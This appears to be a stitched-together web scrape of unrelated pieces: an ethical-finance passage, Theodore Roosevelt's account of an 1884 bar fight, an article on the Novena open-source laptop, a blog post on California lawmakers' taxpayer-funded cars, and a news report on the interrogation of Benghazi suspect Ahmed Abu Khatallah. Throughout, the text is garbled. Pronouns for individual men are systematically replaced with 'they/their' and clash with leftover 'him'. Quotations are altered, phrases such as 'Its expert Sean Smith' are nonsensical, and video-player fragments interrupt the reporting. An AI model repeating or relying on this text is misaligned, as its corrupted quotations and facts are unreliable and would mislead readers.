Finance, therefore — through the renewed structures and operating methods that have to be designed after its misuse, which wreaked such havoc on the real economy — now needs to go back to being an instrument directed towards improved wealth creation and development. Insofar as they are instruments, the entire economy and finance, not just certain sectors, must be used in an ethical way so as to create suitable conditions for human development and for the development of peoples. It is certainly useful, and in some circumstances imperative, to launch financial initiatives in which the humanitarian dimension predominates. However, this must not obscure the fact that the entire financial system has to be aimed at sustaining true development. Above all, the intention to do good must not be considered incompatible with the effective capacity to produce goods. Financiers must rediscover the genuinely ethical foundation of their activity, so as not to abuse the sophisticated instruments which can serve to betray the interests of savers. Right intention, transparency, and the search for positive results are mutually compatible and must never be detached from one another. If love is wise, it can find ways of working in accordance with provident and just expediency, as is illustrated in a significant way by much of the experience of credit unions.
Though it may seem like a typical tall tale of the Old West, Theodore Roosevelt once found themselves in a bar fight in Mingusville, MT (now Wibaux, MT), 35 miles west of Medora. Roosevelt never specified the exact date of the event, but the incident likely occurred in the summer of 1884. That year, Roosevelt was still relatively unknown in the area and grieving the loss of their wife and mother earlier that year.
Roosevelt had been riding for their own enjoyment through the badlands and the prairies of western Dakota Territory and eastern Montana Territory for many days when they arrived at the Nolan's Hotel in Mingusville. There, they encountered a bully who, like others had done who did not know Roosevelt well, teased them about their glasses. Roosevelt described the incident in their own words in their autobiography:
“It was late in the evening when I reached the place. I heard one or two shots in the bar-room as I came up, and I disliked going in. But there was nowhere else to go, and it was a cold night. Inside the room were several men, who, including the bartender, were wearing the kind of smile worn by men who are making believe to like what they don't like. A shabby individual in a broad hat with a cocked gun in each hand was walking up and down the floor talking with strident profanity. They had evidently been shooting at the clock, which had two or three holes in its face.
…As soon as they saw me they hailed me as ‘Four Eyes,' in reference to my spectacles, and said, ‘Four Eyes is going to treat.' I joined in the laugh and got behind the stove and sat down, thinking to escape notice. They followed me, however, and though I tried to pass it off as a jest this merely made them more offensive, and they stood leaning over me, a gun in each hand, using very foul language… In response to their reiterated command that I should set up the drinks, I said, ‘Well, if I've got to, I've got to,' and rose, looking past him.
As I rose, I struck quick and hard with my right just to one side of the point of their jaw, hitting with my left as I straightened out, and then again with my right. They fired the guns, but I do not know whether this was merely a convulsive action of their hands, or whether they were trying to shoot at me. When they went down they struck the corner of the bar with their head… if they had moved I was about to drop on my knees; but they were senseless. I took away their guns, and the other people in the room, who were now loud in their denunciation of him, hustled them out and put them in the shed.”
By the next morning, the bully had left town on a freight train.
Before coming to Dakota, Roosevelt was a successful boxer at Harvard. Roosevelt maintained an interest in various martial arts throughout their life, including judo, kendo, jiu-jitsu, boxing, and wrestling, practicing many of them at the White House.
Chances are that you are not going to find this on display next week at the 2016 International CES (the big tech trade show in Las Vegas). The creators of the $5,000 Novena Heirloom, a laptop built with a completely open and modifiable design, shipped the last premium models to backers last week.
The Heirloom is a special version of the Novena, a “labor of love” project created by hacker Andrew “Bunnie” Huang, along with Sean Cross and designer Kurt Mottweiler. The project is part of a do-it-yourself hardware trend that is sweeping through the hardware industry. That movement has been responsible for the creation of new technologies such as 3D printing, cool robots, and virtual reality headsets.
Huang is the hacker who broke into the original Xbox. They have a love for open-source projects, and thought of the Novena as a hacker's dream laptop. The trio raised $783,329 for the Novena project through hardware crowdfunding site Crowd Supply. Mottweiler worked on the Heirloom with Huang.
There were only 12 Heirlooms made, priced at $5,000 each. They use the same components as the original Novena, including the same board, ROMulater, battery, MyriadRF SSD board, and Freescale iMX6 quad-core Cortex A9 CPU with Neon floating-point unit, running at 1.2 gigahertz. They have ports such as a mini PCI-express slot, HDMI, SD card reader, and two USB 2.0 ports. They also have a resistive touchscreen controller, digital microphone, 3-axis accelerometer, and other components listed here.
The casings are made from four different types of wood – Oregon Walnut, Makore, Black Limba, and Afrormosia. Mottweiler documented the process of making the covers on their blog.
The entire operating system is buildable from source code.
The board itself is $500. The desktop is $1,195, and the basic laptop, dubbed the Novena 1100, is $1,995. The machines will come with Debian (GNU/Linux) preinstalled. This is obviously not aimed at your everyday consumer.
The creators operated under the name Sutajio Kosagi. The design started as a hobby project in June 2012. By December of that year, they had their first working board. They showed off a prototype for a laptop and got an overwhelming response, which led to the creation of a new version of the case and the current design.
California lawmakers may keep their vehicles
There's a little known perk in California law, that allows lawmakers to drive expensive cars, all paid for by taxpayers. the state purchases these cars for the lawmakers to drive around in their districts, under a decades old program, spending more than $5 million for all of these vehicles, which includes a $55,000 Cadillac sedan and a $52,000 Lexus hybrid. All of this is taking place as the state is going broke. And yet next week Gov Schwarzenegger has called legislators into a special session next week to address a $6 billion deficit. Oh but the story gets better. Lawmakers have already cut benefits to programs such as adult dental care, and health care programs for children from low-income families, and more cuts are likely on the way.
Note – California is the only state in the union to provide vehicles to its rank-and-file lawmakers for unlimited use. Meanwhile, the AP asked for all information and the cost to the taxpayers, and they received it upon request. The Senate said it planned on reviewing the program, as is tries to cut costs.
The compensation and benefits that California lawmakers enjoy has come under fire this past year. Legislators fought a plan to cut their pay by 18%, in 2009 while other state employees were enduring three-day-a-month furloughs.
“It just says, 'What's ours is ours; the rules don't apply to us,”' said Charles Murray, chairperson of the California Citizens Compensation Commission, an independent body that sets the compensation for lawmakers and constitutional officers. “I think in tough economic times, all these little sweetheart deals, all these perks, start to come to the surface and people start to ask questions.”
smdailyjournal
The legislator's vehickle program goes back to the 1950s when lawmakers decided it was cheaper to buy cars and gasoline than to be reimbursed by the mile. Instead of having these cars it would be much cheaper reimbursing the lawmakers at the Internal Revenue Service's standard business rate of 50 cents per mile, would likely be more expensive, Barankin said. Hmm, everyone else has to pay for their own fuel going to work, why shouldn't they? The excuse to keep with the current plan is that the state sells the used vehicles after lawmakers are done with them, they said.
But at this reimbursement rate of 50 cents per mile, lawmakers would have to drive a collective 10 million miles to reach the $5 million taken from the general fund to buy the vehicles — equal to more than 3,000 cross-country trips. Senate Minority Leader Bob Dutton, a Republican from Rancho Cucamonga, believes the current system is cheaper than reimbursing legislators for each mile they drive, but also said the program should be re-evaluated as lawmakers look for areas to cut costs..
Taxpayers spent $3.5 million to buy the 99 vehicles lawmakers use when they visit their home districts. And still the 81 member Assembly spent another $1.4 million to buy 49 Toyota Camry Hybrids for 51 lawmakers who live far from the state capital and use the vehicles when they are in Sacramento. The Senate, which has 40 members, spends an additional $81,000 a year to lease 25 vehicles for senators' use in Sacramento. On average, the state has spent $35,250 on all the vehicles the lawmakers use in their districts.
The amount lawmakers contribute varies greatly, depending on the cost of the vehicle they choose. Assemblywoman Lori Saldana, D-San Diego, contributes $31.02 a month toward their 2005 Honda Accord hybrid, while Assemblyman Jim Nielsen, R-Yuba City, pays the most, $397.10, toward their 2009 Ford Edge. Dutton pays $38.79 a month for their Tahoe.
smdailyjournal
With the reductions approved last year, the maximum amount the state will contribute toward a lawmaker's vehicle was reduced from $350 to $287 in the Senate and from $400 to $328 in the Assembly, and in June it was decided not to make any further cuts for lawmakers or statewide officials. And do you know who has the most expensive vehicles? Two Southern California Democrats. Sen. Ron Calderon of Monterey Park drives a $54,830 2006 Cadillac STS while Sen. Gil Cedillo of Los Angeles uses a $52,235 2007 Lexus LX 400H hybrid.
Because the state's monthly payments are capped, Calderon, Cedillo and other lawmakers who choose expensive cars pay the difference out of their pockets. But still, it's the idea the taxpayers are stuck footing most of the bill.
Most states reimburse lawmakers' mileage for official business. Arizona, Nevada and Pennsylvania allow their state lawmakers to check out motor pool vehicles for official trips, while Florida and Minnesota let them use rental cars. New York and the New Jersey Assembly (but not its Senate) provide vehicles only for their top leadership.
smdailyjournal
Advertisements
Story highlights Terror suspect Ahmed Abu Khatallah is being held on the USS New York
Interrogators will get lots of time to squeeze them for fresh terrorism intelligence
Former intel official: Investigators should press them for details on plots
The high seas are a good place to get them to open up, the former official said
Interrogators don't expect to have it easy with Ahmed Abu Khatallah , a Washington law enforcement official told CNN.
The suspected mastermind of the 2012 attack on the U.S. mission in Benghazi, Libya , has had time to rehearse their story, the official said.
But an expert who has interrogated al Qaeda operatives thinks there's a good chance Abu Khatallah will crack, if interrogators punch the right buttons. Others have done so before him.
"Some were motivated by the uncertainty of the situations. Others were motivated, as they called it, (by) fatigue with the jihad life," former Navy intelligence agent Robert McFadden said.
The capture
Months of intelligence research went into Abu Khatallah's capture, Gen. Martin Dempsey, chairperson of the U.S. Joint Chiefs of Staff, said Wednesday night.
Ahmed Abu Khatallah was arrested over the weekend.
Then U.S. Special Forces slipped into Libya by sea over the weekend to nab him.
With FBI agents by their sides, the Special Forces operatives headed to a villa south of Benghazi, a senior law enforcement official said. There, they set a trap and lured Abu Khatallah.
They fell for it, and they delivered them by boat to the USS New York. They also confiscated some "media" at the villa, which investigators will scrutinize.
High seas 'a good place'
Interrogators from the FBI-led High Value Detainee Interrogation Group are on board the ship. Taking Abu Khatallah by sea, rather than by air, is giving them "maximum time to question him," U.S. officials said.
The high seas are a good place for it to happen, McFadden said. "It really is quite conducive to good interviews."
"The main thing is to get the detainee, the subject, to a safe environment with a minimum of distractions."
First they'll let a doctor check them over to make sure they aren't injured when they were captured.
JUST WATCHED U.S. captures key Benghazi suspect Replay More Videos ... MUST WATCH U.S. captures key Benghazi suspect 03:35
JUST WATCHED U.S. captures Benghazi attack suspect Replay More Videos ... MUST WATCH U.S. captures Benghazi attack suspect 02:01
JUST WATCHED Tough Choices: Hillary's Town Hall Replay More Videos ... MUST WATCH Tough Choices: Hillary's Town Hall 03:19
That should go quickly and easily, they said.
Khatallah only wrestled with U.S. forces briefly. Not a shot was fired when they captured him.
After the medical, it's time to meet the interrogators.
McFadden says they should prioritize information that improves national security, like tips that help disrupt plots. They should also get a roster of terrorist players and the lowdown on how they communicate.
Logistical reasons
The sea transport is also being done for logistical reasons.
The United States would have a hard time finding countries in the region willing to allow the ship to transfer a prisoner snatched in an operation such as this.
The Libyan government has decried their capture as a "kidnapping" that violated its territorial sovereignty.
Libyan Justice Minister Salah Marghani said the United States is still a friend of Libya's, but they called for U.S. officials to loop their government in before carrying out such operations.
The Libyan government asked that the United States guarantee the suspect's safety and rights.
Human Rights Watch joined that call Wednesday, asking that Abu Khatallah get access to a lawyer and appear promptly before a judge. They demanded they receive a fair trial.
About that trial
Once the USS New York has neared U.S. shores, officials will put Abu Khatallah into a helicopter and fly them onto land.
The Obama administration has said they will face a federal trial, a position at odds with some of the President's Republican critics, some of them calling for Abu Khatallah to be incarcerated at the U.S. military detention facility in Guantanamo Bay, Cuba.
JUST WATCHED Mom: Government afraid of Benghazi truth Replay More Videos ... MUST WATCH Mom: Government afraid of Benghazi truth 03:36
JUST WATCHED Obama: Benghazi mastermind captured Replay More Videos ... MUST WATCH Obama: Benghazi mastermind captured 01:37
Prosecutors have had a lot of success with terror trials in U.S. civilian courts.
Aspiring Times Square bomber Faisal Shahzad, the so-called underwear bomber Umar Farouk Abdulmutallab, radical cleric Abu Hamza al-Masri and al Qaeda propagandist Sulaiman Abu Ghaith -- all were convicted and sentenced in U.S. courts. And they are but a few examples.
By contrast, there have been a mere handful of Guantanamo convictions.
Abu Khatallah might tell the court the same story about why they were at the U.S. mission the day a mob attacked it, killing Ambassador Christopher Stevens and Its expert Sean Smith.
"I didn't know where the place was," they told CNN last year. "When I heard, we went to examine the situation. When we withdrew and there was shooting with medium guns, and there were RPGs in the air and people panicked, we tried to control traffic."
But U.S. investigators have collected evidence against them for two years, and the accused will be tried on three charges in federal court that include killing while attacking a federal facility and material support of terrorism.
A formal indictment is around the corner, U.S. officials said, and it will include some new charges.
